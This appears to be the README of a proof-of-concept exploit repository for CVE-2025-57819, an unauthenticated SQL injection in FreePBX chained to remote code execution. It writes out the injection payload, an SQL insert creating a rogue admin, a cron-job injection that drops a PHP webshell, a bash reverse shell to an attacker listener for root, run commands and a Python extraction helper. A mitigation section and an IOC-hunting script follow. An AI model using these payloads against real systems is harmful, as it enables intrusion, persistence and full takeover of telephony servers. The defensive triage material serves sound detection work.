JazzTheRabbit/FreePBX-SQLi-RCE
FreePBX CVE-2025-57819 - Unauthenticated SQLi to RCE PoC


Educational & Security Research Only - See Legal Notice Below

Exploitation proof of concept for CVE-2025-57819, a critical unauthenticated SQL injection vulnerability in FreePBX that can be chained into remote code execution. This PoC was published after official patches were released, for security research and authorized testing purposes only.

Overview

FreePBX 15, 16 and 17 installations running an endpoint module below the patched versions are vulnerable to unauthenticated SQL injection in the endpoint module's AJAX handler. This PoC chains that injection into:

  1. Create administrative accounts via SQL injection
  2. Deploy webshells through authenticated cron job injection
  3. Escalate to root (if incron available) via sysadmin_manager hook chain
  4. Full system compromise with reverse shell access

Vulnerability Details

CVE ID     CVE-2025-57819
Type       Unauthenticated SQL Injection (error-based)
CVSS       9.8 / 10.0 (Critical)
Affected   FreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3 (endpoint module versions)
Patched    15.0.66, 16.0.89, 17.0.3+
CISA KEV   Yes (added August 29, 2025)

Vulnerable Endpoint

GET /admin/ajax.php?brand=<PAYLOAD>

The brand parameter in the endpoint module's AJAX handler is passed into a database query without validation, which yields error-based SQL injection: the query result can be forced into the MariaDB error text that the handler returns.


Exploitation Chain

Stage 1: SQL Injection & Admin Account Creation

Verify the SQLi with EXTRACTVALUE() error-based extraction, leaking the current database name (MySQL/MariaDB cap the text quoted in an XPATH syntax error at 32 characters, so longer values have to be pulled out in SUBSTRING() windows):

x' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))-- -

Insert new administrative user into asterisk.ampusers:

INSERT INTO ampusers (username, password_hash, admin) 
VALUES ('pbx_xxxxxxxx', '<MD5_HASH>', 1)
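The extraction helper below is an added example, not code from this repository: it builds the same EXTRACTVALUE() payload for the brand parameter, parses the leaked value out of the MariaDB error text, and windows longer values with SUBSTRING() because the XPATH error text is capped at 32 characters. `fake_target`, `SIMULATED_DB` and the sample usernames are constructed stand-ins so the example runs offline; against a real target `fetch` would be an HTTP GET to /admin/ajax.php?brand=<payload> returning the response body.

```python
import re
from typing import Callable, Optional

# MySQL and MariaDB truncate the text quoted in an XPATH syntax error to 32
# characters, so anything longer has to be pulled out in SUBSTRING() windows.
XPATH_LIMIT = 32
WINDOW = XPATH_LIMIT - 2          # two characters are spent on the '~' markers
LEAK_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def build_payload(subquery: str, offset: int = 1, length: int = WINDOW) -> str:
    """Error-based payload for the brand parameter: the selected value, wrapped
    in '~' markers, is forced into EXTRACTVALUE()'s XPath error message."""
    window = f"SUBSTRING(({subquery}),{offset},{length})"
    return f"x' AND EXTRACTVALUE(1,CONCAT(0x7e,{window},0x7e))-- -"


def parse_leak(body: str) -> Optional[str]:
    """Recover the leaked window from the server's error text, tolerating the
    case where the 32-character cut swallowed the closing '~'."""
    m = LEAK_RE.search(body)
    if not m:
        return None
    return m.group(1).rstrip("~")


def extract(subquery: str, fetch: Callable[[str], str]) -> str:
    """Leak an arbitrary-length value, one window per request."""
    value, offset = "", 1
    while True:
        chunk = parse_leak(fetch(build_payload(subquery, offset)))
        if not chunk:
            break
        value += chunk
        if len(chunk) < WINDOW:      # short window means the value is exhausted
            break
        offset += WINDOW
    return value


# Constructed stand-in for the target so the example runs offline. In the PoC
# `fetch` is an HTTP GET to /admin/ajax.php?brand=<payload>; the rows below
# are invented sample data, not output from any real system.
SIMULATED_DB = {
    "SELECT DATABASE()": "asterisk",
    "SELECT GROUP_CONCAT(username) FROM ampusers": "admin,pbx_a1b2c3d4,helpdesk_operator",
}
PAYLOAD_RE = re.compile(r"SUBSTRING\(\((.*?)\),(\d+),(\d+)\)")


def fake_target(payload: str) -> str:
    """Emulate MariaDB's error text for the payload, including the 32-char cut."""
    m = PAYLOAD_RE.search(payload)
    subquery, offset, length = m.group(1), int(m.group(2)), int(m.group(3))
    piece = SIMULATED_DB.get(subquery, "")[offset - 1: offset - 1 + length]
    quoted = ("~" + piece + "~")[:XPATH_LIMIT]
    return f"ERROR 1105 (HY000): XPATH syntax error: '{quoted}'"


if __name__ == "__main__":
    print(extract("SELECT DATABASE()", fake_target))
    print(extract("SELECT GROUP_CONCAT(username) FROM ampusers", fake_target))
```

The 36-character username list takes two requests (30 characters, then 6); the database name fits in one. Values that legitimately end in '~' lose that character to the `rstrip`, which is the price of tolerating the truncated closing marker.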

Stage 2: Authenticated Cron Job Injection

With the admin credentials created in Stage 1, the exploit logs in to the FreePBX web UI and keeps the session cookies for every subsequent authenticated request.

Inject webshell command into asterisk.cron_jobs:

INSERT INTO cron_jobs (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order)
VALUES ('sysadmin', 'wx', 'echo <BASE64_WEBSHELL>|base64 -d >/var/www/html/shell.php', NULL, '* * * * *', 30, 1, 1)

The FreePBX cron runner executes the command as the asterisk user, dropping the PHP webshell into the web root.

Stage 3: Webshell Activation

The PHP webshell is deployed to /var/www/html/shell.php:

<?php system($_GET['cmd']); ?>

The exploit polls the webshell URL until the cron job has fired, achieving RCE as the asterisk user (uid=999).

Stage 4: Privilege Escalation (Conditional)

If incron is configured on the target:

  1. Create trigger file in /var/spool/asterisk/incron/
  2. incrond (running as root) detects file creation
  3. Invokes /usr/bin/sysadmin_manager with the trigger filename
  4. sysadmin_manager validates GPG signature and dispatches to fwconsole-commands hook
  5. Hook decodes payload and executes: /usr/sbin/fwconsole <COMMAND>
  6. Command injection: help; bash -i >& /dev/tcp/LHOST/LPORT 0>&1

Result: Root shell on reverse listener (if incron available).


What It Abuses

  • No input validation on brand parameter
  • Stacked query execution allows database manipulation
  • Writable asterisk.cron_jobs table executes commands as asterisk
  • Authenticated session persistence via cookies from created admin account
  • Incron filesystem monitoring running as root
  • Unvalidated fwconsole hook execution with command injection

Installation

git clone https://github.com/JazzTheRabbit/cve-2025-57819.git
cd cve-2025-57819
pip3 install requests
chmod +x JTR-CVE-2025-57819.py

Usage

# Setup Netcat Listener
nc -lvnp <Listener Port>

# Run The Exploit
python3 JTR-CVE-2025-57819.py <TARGET_IP> <YOUR_IP> <PORT>

PoC

[PoC screenshot]


Affected Versions

The version numbers below are those of the FreePBX endpoint module, the component that carries the vulnerable AJAX handler.

Version             Status
15.0.0 - 15.0.65    Vulnerable
15.0.66+            Patched
16.0.0 - 16.0.88    Vulnerable
16.0.89+            Patched
17.0.0 - 17.0.2     Vulnerable
17.0.3+             Patched

Mitigation

Immediate:

  • Restrict /admin/ajax.php access from untrusted networks
  • Disable incron if not needed: systemctl disable --now incrond (disable alone leaves the already-running instance up until the next reboot)

Permanent: Upgrade to patched versions: 15.0.66+, 16.0.89+, or 17.0.3+
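The triage script below is an added example, not part of this PoC or of FreePBX: it hunts for the artifacts this chain leaves in the database, namely cron_jobs rows whose command decodes and drops a PHP payload (Stage 2 and 3) and ampusers accounts nobody created (Stage 1). The sample rows, the EXPECTED_ADMINS set and the indicator list are constructed for the example; on a real box feed it the rows of a SELECT over asterisk.cron_jobs and asterisk.ampusers and fill EXPECTED_ADMINS from your own records.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field

# Constructed sample rows shaped like the asterisk.cron_jobs and ampusers
# columns named on this page; not data from a real system. The second cron
# row reproduces the shape of the PoC's injected job.
WEBSHELL_B64 = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
CRON_ROWS = [
    {"modulename": "framework", "jobname": "nightly", "schedule": "0 3 * * *",
     "command": "/usr/sbin/fwconsole backup --id=1"},
    {"modulename": "sysadmin", "jobname": "wx", "schedule": "* * * * *",
     "command": f"echo {WEBSHELL_B64}|base64 -d >/var/www/html/shell.php"},
]
AMPUSERS = ["admin", "pbx_a1b2c3d4"]
EXPECTED_ADMINS = {"admin"}     # assumption: the admin accounts you know you created

# Indicators matched against the raw command and against anything it base64-decodes.
IOCS = [
    (re.compile(r"base64\s+(-d|--decode)\b"), "base64 decode in cron command"),
    (re.compile(r">\s*/var/www/"), "writes into the web root"),
    (re.compile(r"/dev/tcp/"), "bash reverse-shell idiom"),
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"), "download-and-execute"),
    (re.compile(r"<\?php"), "PHP payload in command or decoded blob"),
    (re.compile(r"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)"),
     "PHP webshell primitive"),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_blobs(command: str) -> list[str]:
    """Decode every base64-looking token so a payload hidden behind
    `echo ...|base64 -d` is scanned in clear text, not just as a blob."""
    blobs = []
    for token in B64_TOKEN.findall(command):
        try:
            blobs.append(base64.b64decode(token, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue                # paths and option strings also match the token shape
    return blobs


@dataclass
class Finding:
    modulename: str
    jobname: str
    reasons: list[str] = field(default_factory=list)


def audit_cron_jobs(rows) -> list[Finding]:
    findings = []
    for row in rows:
        texts = [row["command"], *decoded_blobs(row["command"])]
        reasons = [why for pat, why in IOCS if any(pat.search(t) for t in texts)]
        # An every-minute schedule is only interesting next to another indicator.
        if reasons and row.get("schedule") == "* * * * *":
            reasons.append("runs every minute")
        if reasons:
            findings.append(Finding(row["modulename"], row["jobname"], reasons))
    return findings


def audit_ampusers(usernames, expected) -> list[str]:
    """Admin accounts nobody remembers creating (the PoC names its pbx_<8 chars>)."""
    return [u for u in usernames if u not in expected]


if __name__ == "__main__":
    for f in audit_cron_jobs(CRON_ROWS):
        print(f"cron_jobs {f.modulename}/{f.jobname}: {', '.join(f.reasons)}")
    for u in audit_ampusers(AMPUSERS, EXPECTED_ADMINS):
        print(f"ampusers: unexpected admin {u}")
```

Matching on the modulename alone would miss this chain, since the injected row claims to belong to sysadmin; the decoded-blob pass is what turns an opaque base64 argument into a hit on the PHP webshell primitive. Remember to also check the web root itself for the dropped file, which a database query cannot see.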


Legal Notice

⚠️ DISCLAIMER

This proof of concept is provided SOLELY FOR AUTHORIZED SECURITY TESTING AND EDUCATIONAL PURPOSES. The author assumes no liability for misuse or damage caused by this tool.

YOU MUST COMPLY WITH:

  • Computer Fraud and Abuse Act (CFAA) and equivalent laws in your jurisdiction
  • Only test systems you own or have explicit written authorization to test
  • Obtain written permission before any security testing
  • Responsible disclosure practices
  • Privacy and data protection regulations (GDPR, CCPA, etc.)

PROHIBITED USES:

  • Unauthorized access to computer systems
  • Penetration testing without written consent
  • Disruption of services or data theft
  • Any malicious or illegal activity

LIABILITY WAIVER: The author is not responsible for:

  • Unauthorized access or criminal charges
  • Damage to systems or data loss
  • Legal consequences of misuse
  • Violations of computer fraud laws

This vulnerability is:

  • Publicly disclosed (CVE-2025-57819)
  • Patches publicly available
  • Published for security research only
  • Shared responsibly after patch release

Author

JazzTheRabbit

License

MIT License
